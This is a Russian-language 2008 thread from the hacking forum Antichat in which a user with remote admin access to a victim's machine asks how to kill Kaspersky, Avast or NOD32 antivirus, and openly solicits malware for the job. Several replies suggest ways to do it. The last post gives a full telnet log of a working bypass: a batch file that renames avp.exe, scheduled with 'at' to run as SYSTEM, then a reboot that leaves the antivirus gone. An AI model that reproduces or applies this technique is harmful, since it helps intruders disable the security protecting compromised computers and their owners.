ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Защита ОС: вирусы, антивирусы, файрволы.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Убить антивир
  #1  
Старый 17.09.2008, 22:51
Ra1mer
Новичок
Регистрация: 22.10.2007
Сообщений: 9
Провел на форуме:
219727

Репутация: 6
Отправить сообщение для Ra1mer с помощью ICQ
По умолчанию Убить антивир

В общем вопрос такой:
Как можно убить или временно обезвредить антивир имея полный доступ к удаленной машине, ко всем папкам, процессам, шеллу и т.д?? (интересует Аваст. Касперыч, Нод)..
Ну или посоветуйте какуюнибудь малварину для подобных целей..
За ранее благодарен.
 
Ответить с цитированием

  #2  
Старый 17.09.2008, 23:38
spider-intruder
Постоянный
Регистрация: 10.12.2005
Сообщений: 939
Провел на форуме:
3886281

Репутация: 929


Отправить сообщение для spider-intruder с помощью ICQ
По умолчанию

полный доступ к удаленной машине c правами администратора?
 
Ответить с цитированием

  #3  
Старый 18.09.2008, 00:09
Ra1mer
Новичок
Регистрация: 22.10.2007
Сообщений: 9
Провел на форуме:
219727

Репутация: 6
Отправить сообщение для Ra1mer с помощью ICQ
По умолчанию

Цитата:
Сообщение от spider-intruder  
полный доступ к удаленной машине c правами администратора?
Да..
 
Ответить с цитированием

  #4  
Старый 18.09.2008, 00:44
AntX
Новичок
Регистрация: 02.06.2008
Сообщений: 9
Провел на форуме:
196117

Репутация: 9
Отправить сообщение для AntX с помощью ICQ
По умолчанию

Для Каспера есть специальная утилита- KAV/KIS Remover. Найти ее можно на сайте касперского.
 
Ответить с цитированием

  #5  
Старый 18.09.2008, 10:44
paulzey
Познающий
Регистрация: 30.10.2007
Сообщений: 63
Провел на форуме:
299216

Репутация: 59
Отправить сообщение для paulzey с помощью ICQ
По умолчанию

Практически универсальный способ - переименовать исполняемый файл и перезагрузиться.
 
Ответить с цитированием

  #6  
Старый 18.09.2008, 11:55
D1mka
Участник форума
Регистрация: 02.01.2008
Сообщений: 116
Провел на форуме:
1013405

Репутация: 58
По умолчанию

не получится переименовать, т.к. защищен
 
Ответить с цитированием

  #7  
Старый 18.09.2008, 12:03
Pernat1y
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
Провел на форуме:
1636674

Репутация: 171


По умолчанию

у обычных антивирусов можно просто грохнуть процесс/сервис и потом отрубить автозагрузку.
с каспером сложнее )
 
Ответить с цитированием

  #8  
Старый 18.09.2008, 14:54
Ra1mer
Новичок
Регистрация: 22.10.2007
Сообщений: 9
Провел на форуме:
219727

Репутация: 6
Отправить сообщение для Ra1mer с помощью ICQ
По умолчанию

Цитата:
у обычных антивирусов можно просто грохнуть процесс/сервис и потом отрубить автозагрузку.
В самом начале пробовал и на Ноде и на Авасте, процессы/сервисы не мрут) Тутже выплывают новые, либо так и стоят.. С автозагрузкой тоже самое..
Цитата:
Для Каспера есть специальная утилита- KAV/KIS Remover. Найти ее можно на сайте касперского.
Спасиб, над будет юзнуть.. Но если он представляет собой простой унинсталл то не получится, мышкой за жертву я "ок" нажимать не обладаю..
Цитата:
Практически универсальный способ - переименовать исполняемый файл и перезагрузиться.
Ушел пробовать..
--
Не.. Защищен, не хочет.

Последний раз редактировалось Ra1mer; 18.09.2008 в 16:23..
 
Ответить с цитированием

  #9  
Старый 21.09.2008, 17:32
Ra1mer
Новичок
Регистрация: 22.10.2007
Сообщений: 9
Провел на форуме:
219727

Репутация: 6
Отправить сообщение для Ra1mer с помощью ICQ
По умолчанию

По прежнему ищу выход)
 
Ответить с цитированием

  #10  
Старый 24.09.2008, 20:31
paulzey
Познающий
Регистрация: 30.10.2007
Сообщений: 63
Провел на форуме:
299216

Репутация: 59
Отправить сообщение для paulzey с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ra1mer  
Не.. Защищен, не хочет.
Естественно, потому как просто админовских прав недостаточно. Подразумевалось, что пользователь сам способен поднять права.
Демонстрирую небольшой лог моей telnet-сессии, как оное должно быть (с мини-комментариями, выделены зелёным, если надо полнее - отпишусь).
Система - Windows XP Pro Sp2, KAV 7.0, потенциально будет работать и на других антивирусах.

C:\>tasklist

Код:
Имя образа                   PID Имя сессии       № сеанса       Память
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0        28 КБ
System                         4 Console                 0       264 КБ
smss.exe                     548 Console                 0       436 КБ
csrss.exe                    700 Console                 0     3 668 КБ
winlogon.exe                 724 Console                 0     4 688 КБ
services.exe                 888 Console                 0     3 196 КБ
lsass.exe                    900 Console                 0     1 388 КБ
svchost.exe                 1104 Console                 0     4 852 КБ
svchost.exe                 1240 Console                 0     4 324 КБ
svchost.exe                 1368 Console                 0    21 720 КБ
svchost.exe                 1580 Console                 0     3 376 КБ
svchost.exe                 1620 Console                 0     4 816 КБ
spoolsv.exe                 1840 Console                 0     4 784 КБ
avp.exe                     2024 Console                 0     7 820 КБ
tlntsvr.exe                  272 Console                 0     2 824 КБ
alg.exe                      912 Console                 0     3 528 КБ
explorer.exe                1504 Console                 0    12 896 КБ
avp.exe                     1788 Console                 0     6 332 КБ
ctfmon.exe                  1876 Console                 0     2 992 КБ
tlntsess.exe                1032 Console                 0     3 768 КБ
cmd.exe                     1320 Console                 0     1 608 КБ
tasklist.exe                1148 Console                 0     3 124 КБ
wmiprvse.exe                 760 Console                 0     5 428 КБ
Как видно, в процессах есть. Ищем папку, пытаемся переименовать.

C:\>cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0"

C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>move avp.exe avp.ex_
Отказано в доступе.

Ожидаемый и печальный эффект, поднимаем права до Local System.

C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>cd \

C:\>copy con kill_avp.bat
@echo off
cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0"
move avp.exe avp.ex_
^Z
Скопировано файлов: 1.

C:\>type kill_avp.bat
@echo off
cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0"
move avp.exe avp.ex_

C:\>time
Текущее время: 18:19:05,92
Введите новое время:

C:\>at 18:20 c:\kill_avp.bat
Добавлена новая задача с кодом 1

C:\>cd "c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0"

C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>dir *.exe
Том в устройстве C не имеет метки.
Серийный номер тома: D007-EFC9

Содержимое папки C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0

28.06.2007 12:58 10 560 rescue32.exe
1 файлов 10 560 байт
0 папок 1 244 950 528 байт свободно

C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>dir *.ex_
Том в устройстве C не имеет метки.
Серийный номер тома: D007-EFC9

Содержимое папки C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0

28.06.2007 12:51 218 376 avp.ex_
1 файлов 218 376 байт
0 папок 1 244 950 528 байт свободно

C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>

Ну вот, собственно говоря, и всё.

C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0>shutdown -r -t 0

сообщение от администратора в PAUL, 24.09.2008 18:25:55

The computer is shutting down......

Подключение к узлу утеряно.

Вторая сессия:

C:\Documents and Settings\admin>tasklist

Код:
Имя образа                   PID Имя сессии       № сеанса       Память
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0        28 КБ
System                         4 Console                 0       264 КБ
smss.exe                     552 Console                 0       384 КБ
csrss.exe                    704 Console                 0     3 220 КБ
winlogon.exe                 728 Console                 0     9 352 КБ
services.exe                 892 Console                 0     2 828 КБ
lsass.exe                    904 Console                 0     5 692 КБ
svchost.exe                 1108 Console                 0     4 452 КБ
svchost.exe                 1256 Console                 0     4 020 КБ
svchost.exe                 1380 Console                 0    17 056 КБ
logonui.exe                 1392 Console                 0     3 508 КБ
svchost.exe                 1528 Console                 0     3 128 КБ
svchost.exe                 1588 Console                 0     3 764 КБ
spoolsv.exe                 1872 Console                 0     4 396 КБ
tlntsvr.exe                  348 Console                 0     2 608 КБ
alg.exe                      780 Console                 0     3 276 КБ
tlntsess.exe                 788 Console                 0     3 536 КБ
wuauclt.exe                 1232 Console                 0     6 436 КБ
cmd.exe                     1360 Console                 0     1 320 КБ
tasklist.exe                1656 Console                 0     3 112 КБ
wmiprvse.exe                1688 Console                 0     5 404 КБ
Any more questions?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
чем депресняк можно убить? mind Болталка 35 03.07.2008 18:57
Что за процесс и как его убить? [Dezzter] Windows 31 30.05.2008 01:59
Отгадайте как можно убить человека кусочком туалетной бумаги? PEPSICOLA Болталка 11 27.12.2005 23:04
Как убить процесс в unix? virgoz Болталка 3 28.11.2005 09:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ